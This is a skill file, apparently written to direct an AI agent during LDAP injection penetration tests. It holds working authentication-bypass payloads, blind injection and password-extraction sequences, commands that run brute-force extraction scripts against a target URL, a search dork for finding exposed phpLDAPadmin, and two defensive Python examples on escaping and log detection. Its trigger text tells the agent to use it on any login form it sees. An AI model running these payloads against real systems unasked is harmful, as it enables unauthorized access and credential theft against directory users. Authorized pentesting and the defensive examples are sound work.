Hacktricks-skills ldap-injection-pentest

Use this skill whenever you need to test for LDAP injection vulnerabilities, analyze LDAP queries, or perform LDAP security assessments. Trigger this skill for any LDAP-related security testing, authentication bypass attempts, directory service penetration testing, or when investigating web applications that use LDAP for authentication. Don't forget to use this skill when you see login forms, directory services, or any application that might be vulnerable to LDAP injection attacks.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/ldap-injection/SKILL.MD
source content

LDAP Injection Pentesting

A comprehensive skill for testing and exploiting LDAP injection vulnerabilities in web applications.

Overview

LDAP Injection is an attack targeting web applications that construct LDAP statements from user input. It occurs when the application fails to properly sanitize that input, allowing an attacker (typically tampering with requests through a local intercepting proxy) to alter the structure of the LDAP statement, potentially leading to unauthorized access or data manipulation.

LDAP Filter Syntax

Understanding LDAP filter syntax is essential for crafting injection payloads:

Filter      = "(" filtercomp ")"
Filtercomp  = and / or / not / item
And         = "&" filterlist
Or          = "|" filterlist
Not         = "!" filter
Filterlist  = 1*filter
Item        = simple / present / substring
Simple      = attr filtertype assertionvalue
Filtertype  = "=" / "~=" / ">=" / "<="
Present     = attr "=" "*"
Substring   = attr "=" [initial] "*" [final]

Key operators:

  • (&) = AND (absolute TRUE when it has no sub-filters)
  • (|) = OR (absolute FALSE when it has no sub-filters)
  • (!) = NOT

Example filters:

(&(objectClass=user)(uid=s*))
(&(directory=val1)(folder=public))

Important: The filter must start with & or |. Send only 1 filter to avoid errors on most LDAP servers.

LDAP Server Behaviors

Different LDAP servers handle multiple filters differently:

  Server                        Behavior with 2 filters
  OpenLDAP                      Executes only the first one
  ADAM / Microsoft LDS          Throws an error
  SunOne Directory Server 5.0   Executes both filters

Login Bypass Techniques

LDAP supports several password formats (clear, md5, smd5, sha1, sha, crypt). Use these payloads to bypass authentication:

Universal Bypass

user=*
password=*
# Results in: (&(user=*)(password=*))

Filter Termination

user=*)(&
password=*)(&
# Results in: (&(user=*)(&)(password=*)(&))

OR Injection

user=*)(|(&
pass=pwd)
# Results in: (&(user=*)(|(&)(pass=pwd))

Password Bypass with OR

user=*)(|(password=*
password=test)
# Results in: (&(user=*)(|(password=*)(password=test))

Null Byte Termination

user=admin))%00
pass=any
# Results in: (&(user=admin))%00 - Nothing more is executed

Complex Bypass

username=admin)(!(&(|
pass=any))
# Results in: (&(uid=admin)(!(&(|)(webpassword=any))))
# As (|) is FALSE, (&(|)(webpassword=any)) is FALSE and its negation (!...) is TRUE, so only uid=admin has to hold and the password check is bypassed
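To see exactly what these payloads do to the filter an application builds, here is an added Python example (it is not code from the hacktricks-skills repository). It contains a small parser and evaluator for the RFC 4515 filter grammar shown under LDAP Filter Syntax, a naive string-concatenation filter builder of the kind the payloads above rely on, and the same builder with RFC 4515 value escaping applied. The directory entries, the attribute names user and password (the Complex Bypass above shows uid and webpassword instead) and all function names are constructed for this example; parse_filter returning everything after the first balanced filter as a remainder is a simplification of the per-server behaviours tabulated earlier.

```python
# Added example (not part of the hacktricks-skills repo): a minimal RFC 4515
# filter parser/evaluator to show how the bypass payloads above reshape an
# application-built filter, and how value escaping stops them.
import re

# Characters RFC 4515 requires to be escaped inside an assertion value.
SPECIAL = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input so it can only ever be a literal assertion value."""
    return "".join(SPECIAL.get(ch, ch) for ch in value)


def build_filter_vulnerable(user: str, password: str) -> str:
    """Naive concatenation: the pattern every payload above relies on."""
    return f"(&(user={user})(password={password}))"


def build_filter_safe(user: str, password: str) -> str:
    """Same filter with both values escaped (hypothetical fixed version)."""
    return f"(&(user={escape_filter_value(user)})(password={escape_filter_value(password)}))"


def parse_filter(text: str):
    """Parse the first balanced filter in `text` into a tuple tree.

    Returns (tree, remainder). Anything after the first balanced filter is
    returned untouched, a simplification of the per-server behaviours listed
    above (e.g. the %00 payload leaves its tail in `remainder`)."""
    tree, pos = _parse(text, 0)
    return tree, text[pos:]


def _parse(s: str, i: int):
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if i >= len(s):
        raise ValueError("unexpected end of filter")
    op = s[i]
    if op in "&|!":                      # and / or / not: zero or more sub-filters
        i += 1
        kids = []
        while i < len(s) and s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        if i >= len(s) or s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return (op, kids), i + 1
    end = s.index(")", i)                # item: attr filtertype assertionvalue
    m = re.fullmatch(r"([A-Za-z][\w\-]*)(~=|>=|<=|=)(.*)", s[i:end], re.S)
    if not m:
        raise ValueError(f"malformed item {s[i:end]!r}")
    attr, ftype, value = m.groups()
    return ("item", attr.lower(), ftype, value), end + 1


def _unescape(value: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def _match(pattern: str, actual: str) -> bool:
    # A raw '*' is a wildcard (present/substring); an escaped \2a is a literal '*'.
    parts = [re.escape(_unescape(p)) for p in pattern.split("*")]
    return re.fullmatch(".*".join(parts), actual, re.S) is not None


def evaluate(tree, entry: dict) -> bool:
    op = tree[0]
    if op == "&":                        # (&) with no children is absolute TRUE
        return all(evaluate(k, entry) for k in tree[1])
    if op == "|":                        # (|) with no children is absolute FALSE
        return any(evaluate(k, entry) for k in tree[1])
    if op == "!":
        return bool(tree[1]) and not evaluate(tree[1][0], entry)
    _, attr, ftype, value = tree
    actual = entry.get(attr)
    if actual is None:
        return False
    if ftype == "=":
        return _match(value, actual)
    if ftype == "~=":
        return _unescape(value).lower() == actual.lower()
    return actual >= _unescape(value) if ftype == ">=" else actual <= _unescape(value)


# Constructed directory entries for the demonstration.
DIRECTORY = [
    {"user": "admin", "password": "S3cret!"},
    {"user": "alice", "password": "wonderland"},
]


def login_matches(builder, user: str, password: str) -> list:
    """Which directory entries the built filter would bind as."""
    tree, _rest = parse_filter(builder(user, password))
    return [e["user"] for e in DIRECTORY if evaluate(tree, e)]


if __name__ == "__main__":
    payloads = [("*", "*"), ("*)(&", "*)(&"), ("admin)(!(&(|", "any))"), ("admin))\x00", "any")]
    for user, password in payloads:
        print(repr(build_filter_vulnerable(user, password)), login_matches(build_filter_vulnerable, user, password))
        print(repr(build_filter_safe(user, password)), login_matches(build_filter_safe, user, password))
```

Running the block shows the vulnerable builder binding as every entry for the Universal Bypass and Filter Termination payloads, as admin for the Complex Bypass and null-byte payloads, and the escaped builder matching nothing for all of them, because each metacharacter arrives as \2a, \28, \29 or \00 and is compared literally. Production code should use the escaping helper of its LDAP library rather than a hand-written table, but the fix is the same: user input only ever reaches the filter as an escaped assertion value.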

Blind LDAP Injection

When you can't see direct output, force True/False responses to confirm vulnerability:

True Response (Information Shown)

Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass=*)(objectClass=*))(&objectClass=void)(type=Pepi*))

False Response (No Information)

Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass=void)(objectClass=void))(&objectClass=void)(type=Pepi*))

Data Extraction

Iterate over ASCII characters to extract data:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
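From the defender's side, the probing sequence above and the bypass payloads listed earlier leave recognisable traces in web-server logs. The following added Python example (not part of the hacktricks-skills repository) runs simple indicator matching plus a blind-extraction heuristic over a few constructed combined-format access-log lines; the hosts, paths, parameter names, indicator regexes and the threshold are made up for the illustration.

```python
# Added example, not from the hacktricks-skills repo: defender-side detection of
# the injection and blind-extraction patterns described above, run over a few
# constructed web-server access-log lines (combined log format, fake hosts).
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: one legitimate login, three bypass attempts from one
# client, and a character-by-character probe of the password attribute.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login?user=alice&password=wonderland HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /login?user=*&password=* HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /login?user=admin))%00&password=any HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /login?user=*)(|(password=*&password=test) HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /login?user=admin)(password=A*&password=x HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2024:10:01:01 +0000] "GET /login?user=admin)(password=B*&password=x HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /login?user=admin)(password=C*&password=x HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2024:10:01:03 +0000] "GET /login?user=admin)(password=M*&password=x HTTP/1.1" 200 1800
10.0.0.7 - - [01/Jan/2024:10:01:04 +0000] "GET /login?user=admin)(password=MA*&password=x HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) '
    r'(?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\d+)'
)

# Indicators checked against each URL-decoded parameter value.
INDICATORS = [
    ("wildcard_only", re.compile(r"^\*$")),      # user=* / password=*
    ("filter_break", re.compile(r"\)\(")),        # ")(" closes one item, opens another
    ("operator_inject", re.compile(r"\([&|!]")),  # injected (& (| (!
    ("null_byte", re.compile("\x00")),            # %00 truncation
]
# attr=PREFIX* inside a value: one step of the extraction loop shown above.
PROBE_RE = re.compile(r"(\w+)=([^()*]*)\*")


def parse_line(line: str):
    """Parse one combined-format log line; returns None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    url = urlsplit(req["target"])
    req["path"] = url.path
    # parse_qs decodes once, so %00 and %26 come back as the literal characters.
    req["params"] = parse_qs(url.query, keep_blank_values=True)
    return req


def flag_request(req: dict) -> list:
    """Return (param, indicator) pairs for every suspicious parameter value."""
    hits = []
    for name, values in req["params"].items():
        for value in values:
            hits.extend((name, label) for label, rx in INDICATORS if rx.search(value))
    return hits


def detect_probing(requests: list, threshold: int = 4) -> dict:
    """Blind extraction leaves a trail: one client hitting one endpoint with
    attr=PREFIX* assertions whose prefixes change and grow. Group by client,
    path, parameter and probed attribute; report groups with at least
    `threshold` distinct prefixes, in the order they were seen."""
    prefixes = defaultdict(list)
    for req in requests:
        for name, values in req["params"].items():
            for value in values:
                for attr, prefix in PROBE_RE.findall(value):
                    key = (req["ip"], req["path"], name, attr)
                    if prefix not in prefixes[key]:
                        prefixes[key].append(prefix)
    return {k: v for k, v in prefixes.items() if len(v) >= threshold}


def analyze(log_text: str):
    """Return (flagged requests as (ip, path, param, indicator), probing groups)."""
    requests = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    flagged = [(r["ip"], r["path"], name, label) for r in requests for name, label in flag_request(r)]
    return flagged, detect_probing(requests)


if __name__ == "__main__":
    flagged, probing = analyze(SAMPLE_LOG)
    for item in flagged:
        print("indicator:", item)
    for key, seen in probing.items():
        print("probing:", key, "prefixes seen:", seen)
```

The indicator list is deliberately narrow (a legitimate value can contain a parenthesis), so treat single hits as triage input and the probing group as the stronger signal: dozens of requests from one client to one endpoint whose only difference is a growing prefix before a wildcard rarely has a benign explanation. Both checks become much more useful when the application also logs the LDAP filter it finally sent, because that is where the reshaped structure is visible directly.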

Testing Scripts

Discover Valid LDAP Fields

Use scripts/discover-ldap-fields.py to brute-force LDAP attributes and extract information:

python3 scripts/discover-ldap-fields.py --url <target-url> --proxy <proxy-url>

This script:

  • Tests common LDAP attributes (uid, cn, sn, mail, etc.)
  • Brute-forces values character by character
  • Identifies which attributes contain data

Blind LDAP Extraction

Use scripts/blind-ldap-extract.py for blind injection without wildcards:

python3 scripts/blind-ldap-extract.py --url <target-url> --max-chars 50

This script:

  • Extracts data one character at a time
  • Works on applications without wildcard support
  • Outputs extracted values in real-time

Common LDAP Attributes

Test these default attributes when brute-forcing:

c, cn, co, commonName, dc, facsimileTelephoneNumber, givenName, gn,
homePhone, id, jpegPhoto, l, mail, mobile, name, o, objectClass, ou,
owner, pager, password, sn, st, surname, uid, username, userPassword

Google Dorks

Find vulnerable applications:

intitle:"phpLDAPadmin" inurl:cmd.php

Testing Workflow

  1. Identify the target - Find login forms or search functionality using LDAP
  2. Test for vulnerability - Try basic payloads like *)(objectClass=*)
  3. Determine server type - Test with multiple filters to identify LDAP server
  4. Choose attack method - Direct injection or blind injection based on response
  5. Extract data - Use scripts or manual iteration to extract credentials/information
  6. Document findings - Record payloads, responses, and extracted data

Payload Resources

Safety Notes

  • Always obtain proper authorization before testing
  • Use a local proxy (Burp Suite, OWASP ZAP) to intercept and modify requests
  • Rate limit your requests to avoid triggering bans
  • Document all findings for remediation
  • Test in isolated environments when possible